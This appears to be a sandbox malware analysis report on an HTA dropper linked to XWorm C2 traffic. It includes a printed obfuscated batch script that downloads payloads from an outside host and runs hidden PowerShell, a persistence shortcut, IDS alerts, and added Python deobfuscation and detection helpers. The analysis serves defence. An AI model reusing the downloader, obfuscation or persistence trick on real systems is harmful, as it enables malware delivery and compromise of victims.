                                                                      Preview:PK..........\Y.F.%..:....5....msword.exe..|T.?~.G.l.E...4BP....(qA......f...*..@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.*42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.|...z.,j
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):891289591
                                                                      Entropy (8bit):4.230074047814782
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:C744E054E4EF01832BBF43B81D397B61
                                                                      SHA1:3360299F013BCD729FD1993280B9304605457238
                                                                      SHA-256:4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
                                                                      SHA-512:4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\mshta.exe
                                                                      File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):3432
                                                                      Entropy (8bit):5.234062070088092
                                                                      Encrypted:false
                                                                      SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                      MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                      SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                      SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                      SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                      Malicious:true
                                                                      Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%
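The batch file previewed above hides every command behind references to environment variables that are never defined. Inside a batch file cmd.exe expands an undefined %NAME% to an empty string, so the junk disappears at run time: the first line collapses to @echo off and the last previewed line to powershell -WindowStyle H (truncated in the preview). The Python below is an added example, not code from the Joe Sandbox report or from the sample, that reverses the trick while keeping references the script itself defines (set url=...) or that the caller supplies as host environment (TEMP). The sample input reuses the first previewed line and the start of the last one verbatim; the set line and the command tail after "-WindowStyle H" are constructed here with a placeholder URL.

```python
import re
from typing import Dict, List, Optional

# cmd.exe pairs '%' signs left to right, so leftmost non-overlapping matching
# (what re.sub does) splits "%GhaE%e%QON%" into %GhaE%, the literal e, %QON%.
_VAR_REF = re.compile(r"%([A-Za-z0-9_]+)%")
# Matches 'set name=value' and 'set "name=value"' once the junk is gone.
_SET_LINE = re.compile(r'^\s*set\s+"?([^="]+)=(.*?)"?\s*$', re.IGNORECASE)


def deobfuscate_cmd_line(line: str, known: Dict[str, str], expand: bool) -> str:
    """Drop every %NAME% that is not in `known`; keep or expand the rest."""
    def replace(match):
        name = match.group(1).lower()
        if name in known:
            return known[name] if expand else match.group(0)
        return ""  # an undefined variable in a batch file expands to nothing
    return _VAR_REF.sub(replace, line)


def deobfuscate_cmd_script(text: str, env: Optional[Dict[str, str]] = None,
                           expand: bool = False) -> List[str]:
    """Clean a whole script, learning names from its own set lines as it goes.

    `env` holds variables the host defines (TEMP, APPDATA, ...). Without it
    those references look like junk and are deleted, so pass the names you
    expect to exist on the victim machine.
    """
    known = {k.lower(): v for k, v in (env or {}).items()}
    cleaned: List[str] = []
    for raw in text.splitlines():
        line = deobfuscate_cmd_line(raw, known, expand)
        m = _SET_LINE.match(line)
        if m:  # later lines may reference this name, so remember it
            known[m.group(1).strip().lower()] = m.group(2)
        cleaned.append(line)
    return cleaned


# Constructed sample. Line 1 and the first part of line 3 are the previewed
# batch file verbatim; the set line and the tail after "-WindowStyle H" are
# made up for this example and use a placeholder URL.
SAMPLE_BAT = "\r\n".join([
    "@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%",
    "s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%"
    + "=https://example.invalid/stage2.zip",
    "p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% "
    + "%u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%"
    + "t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%"
    + 'idden -c "iwr %url% -OutFile %TEMP%\\s.zip"',
])

if __name__ == "__main__":
    for line in deobfuscate_cmd_script(SAMPLE_BAT, env={"TEMP": r"C:\Temp"}):
        print(line)
```

Run it with expand=True to see the final command line as cmd.exe would build it; leave expand off when you want to keep the script's own variable names visible for reporting. The caveat in practice is the env argument: a variable such as %TEMP% that the script never sets is indistinguishable from junk unless you tell the cleaner it exists.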
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):98
                                                                      Entropy (8bit):4.847622824451179
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5mJ17ufLOcsaYuPA/y:HRYF5yjowkn23mf7YswIy
                                                                      MD5:E0B7B80EFEA8FEE463E17B9DFAC63CD8
                                                                      SHA1:0E67515AE0FDD6FEFE5507909217BD6B3910BF8D
                                                                      SHA-256:D2F171FDFED8A949684DF0B49832AC23CEFCBB2A58AC79C394C1C009F4B32597
                                                                      SHA-512:826DCDA1E414189F36DED4028AF8F8DEDC5926C4739E0F907295211E45163F476E0E60CF848D6503E873ACA0735D88766339E73886D3A9AA99ED2087B933532F
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..
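The shortcut above is an Internet shortcut (.url) whose URL= value is a local JScript file, not a web address; when Explorer opens such a shortcut it hands the target to ShellExecute, so a .url file in a Startup folder becomes a script launcher. The Python below is an added example, not code from the report or the sample, that classifies InternetShortcut content by whether its target resolves to a local path with a script or executable extension, and then applies that check to the usual per-user and all-users Startup folders. The first sample is the previewed file; the second is a constructed benign web shortcut for contrast. The Startup folder locations assume a standard Windows layout.

```python
import ntpath
import os
import re
from typing import Iterator, Optional, Tuple

# A local target with one of these extensions is executed, not browsed,
# when the shortcut is opened.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".bat", ".cmd", ".ps1", ".exe", ".scr", ".lnk", ".dll"}

_URL_LINE = re.compile(r'^\s*URL\s*=\s*"?(.*?)"?\s*$', re.IGNORECASE)
_LOCAL_PATH = re.compile(r"^(?:[a-z]:[\\/]|\\\\)", re.IGNORECASE)


def shortcut_target(content: str) -> Optional[str]:
    """Return the URL= value inside the [InternetShortcut] section, else None."""
    in_section = False
    for line in content.splitlines():
        stripped = line.strip()
        if stripped.startswith("["):
            in_section = stripped.lower() == "[internetshortcut]"
            continue
        if in_section:
            m = _URL_LINE.match(line)
            if m:
                return m.group(1).strip()
    return None


def local_target_path(target: str) -> Optional[str]:
    """Map a URL= value to a local path; None for http(s) and other schemes."""
    if target.lower().startswith("file:"):
        target = target[5:].lstrip("/")          # file:///C:/x -> C:/x
        if _LOCAL_PATH.match(target) is None:
            target = "\\\\" + target             # file://server/share -> UNC
    return target if _LOCAL_PATH.match(target) else None


def is_suspicious_shortcut(content: str) -> bool:
    """True when the shortcut points at a local script or executable."""
    target = shortcut_target(content)
    path = local_target_path(target) if target else None
    if path is None:
        return False
    return ntpath.splitext(path)[1].lower() in SCRIPT_EXTENSIONS


def scan_startup_folders() -> Iterator[Tuple[str, str]]:
    """Yield (shortcut path, target) for suspicious .url files in Startup folders."""
    candidates = [
        os.path.join(os.environ.get("APPDATA", ""),
                     r"Microsoft\Windows\Start Menu\Programs\Startup"),
        os.path.join(os.environ.get("ProgramData", ""),
                     r"Microsoft\Windows\Start Menu\Programs\StartUp"),
    ]
    for folder in candidates:
        if not os.path.isdir(folder):
            continue
        for name in os.listdir(folder):
            if not name.lower().endswith(".url"):
                continue
            full = os.path.join(folder, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            if is_suspicious_shortcut(content):
                yield full, shortcut_target(content) or ""


# Sample 1 is the dropped shortcut previewed above (trailing spaces and CRLF
# as in the file); sample 2 is a constructed benign web shortcut.
DROPPED_URL_FILE = ("[InternetShortcut] \r\n"
                    'URL="C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.js" \r\n')
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.invalid/\r\n"

if __name__ == "__main__":
    print("dropped:", is_suspicious_shortcut(DROPPED_URL_FILE))
    print("benign:", is_suspicious_shortcut(BENIGN_URL_FILE))
    for path, target in scan_startup_folders():
        print(f"{path} -> {target}")
```

The classifier deliberately treats file: URLs and UNC paths the same as drive-letter paths, since all three are opened locally; a target with an unknown scheme is ignored rather than flagged, so extend SCRIPT_EXTENSIONS or the scheme handling if your environment uses other launchers.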
                                                                      Process:C:\Windows\SysWOW64\timeout.exe
                                                                      File Type:ASCII text, with very long lines (411), with CRLF line terminators, with overstriking
                                                                      Category:dropped
                                                                      Size (bytes):415
                                                                      Entropy (8bit):3.4014677996260176
                                                                      Encrypted:false
                                                                      SSDEEP:12:hYFTkv1ag7Y5PTgwQ6t6iQUAv/0U0DvsFyESnQBt1XtX:GFIdlQP8kW/0D0FVSnQb19X
                                                                      MD5:61E1CBA13946260690BB73DED66BDA6F
                                                                      SHA1:09BE31351D2EE985EB5D0676358A84BC5F89B8AC
                                                                      SHA-256:F0EB6C2E9F73CD4D7407D3E6B0ADADD4DCA1C23D725A5908208B4F7B748D8879
                                                                      SHA-512:BF4DA774430539C570CB86BE9C289C671CFD399B91AD79522BBB65099E7A90DCF5805B45B0A6D17C6A77E585099D74F9F9304CBA7F0D2A6EEB5D87FB47B96EF9
                                                                      Malicious:false
                                                                      Preview:..Waiting for 90 seconds, press a key to continue .....89..88..87..86..85..84..83..82..81..80..79..78..77..76..75..74..73..72..71..70..69..68..67..66..65..64..63..62..61..60..59..58..57..56..55..54..53..52..51..50..49..48..47..46..45..44..43..42..41..40..39..38..37..36..35..34..33..32..31..30..29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
                                                                      File type:HTML document, ASCII text, with CRLF line terminators
                                                                      Entropy (8bit):4.556341877302457
                                                                      TrID:
                                                                      • HyperText Markup Language (12001/1) 40.67%
                                                                      • HyperText Markup Language (11501/1) 38.98%
                                                                      • HyperText Markup Language (6006/1) 20.35%
                                                                      File name:c2.hta
                                                                      File size:3'490 bytes
                                                                      MD5:46db5c83fa1e4259626582d675a2daba
                                                                      SHA1:9cecd043306e50fb5d6c6a8b4e13631aa8641555
                                                                      SHA256:6b29ae721c54add4df7663f763f8be6a1a65259a2243d563a0f3c972ac64623a
                                                                      SHA512:8884cb39252d090fcf8455652373726e780ea138e01ac8421e762d59d8073a3f97d9b144db972be4cffe92068c3fdb840154df6a8ce7d2c07951a3c2273d4798
                                                                      SSDEEP:48:wEqvfTntHcmhdT1hnLU5Lo1fWKGUTF50H3/CO:wZrnJhV1hL6/LeQH3
                                                                      TLSH:F071BE1FDEE39F628932CA23086BA80DDD9CC90B15518489750C8C4D7F7537CA8D16FA
                                                                      File Content Preview:<html>..<head>.. <title>BAT Downloader</title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SHOWINTASKBAR="NO"..
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T01:35:52.437012+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
2024-12-16T01:35:52.437012+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
2024-12-16T01:35:55.067781+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49994 | 193.26.115.21 | 7007 | TCP
2024-12-16T01:36:22.453200+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
2024-12-16T01:36:22.453200+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
2024-12-16T01:36:52.453777+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
2024-12-16T01:36:52.453777+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 193.26.115.21 | 7007 | 192.168.2.4 | 49994 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 01:33:00.080493927 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:00.080595016 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:00.080693007 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:00.090991974 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:00.091074944 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.378298998 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.378501892 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.536575079 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.536659002 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.537695885 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.537873983 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.543668032 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.587352991 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.888662100 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.888716936 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.888844013 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:01.888870955 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.888870955 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.888946056 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.948278904 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:01.948343039 CET | 443 | 49732 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:02.973670006 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:02.973759890 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:02.973934889 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:02.982512951 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:02.982592106 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.293183088 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.293296099 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.294897079 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.294951916 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.295792103 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.302860975 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.343353033 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.763108015 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.763180971 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.763360977 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.763428926 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.809906960 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.959383011 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.959393978 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.959501028 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.959544897 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.959582090 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.959603071 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:04.959629059 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:04.959861040 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.010627985 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.010663986 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.010792971 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.010792971 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.010854959 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.010936022 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.145585060 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.145637035 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.145761013 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.145761013 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.145828962 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.145886898 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.172939062 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.172987938 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.173094034 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.173094988 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.173158884 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.173218012 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.195699930 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.195749044 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.195873022 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.195873022 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.195936918 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.195993900 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.296422005 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.296463013 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.296511889 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.296585083 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.296623945 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.296652079 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.345175028 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.345227957 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.345269918 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.345304966 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.345334053 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.345357895 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.366879940 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.366924047 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.367049932 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.367050886 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.367115021 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.367171049 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.387523890 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.387569904 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.387718916 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.387720108 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.387784004 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.387845039 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.399290085 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.399352074 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.399458885 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.399458885 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.399523973 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.399580002 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.411863089 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.411904097 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.412049055 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.412050009 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.412113905 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.412169933 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.488384008 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.488432884 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.488553047 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.488554001 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.488617897 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.488672972 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.529005051 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.529047012 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.529162884 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.529162884 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.529227972 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.529289007 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.540096045 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.540137053 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.540252924 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.540252924 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.540317059 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.540366888 CET | 49734 | 443 | 192.168.2.4 | 193.26.115.21
Dec 16, 2024 01:33:05.548209906 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
Dec 16, 2024 01:33:05.548252106 CET | 443 | 49734 | 193.26.115.21 | 192.168.2.4
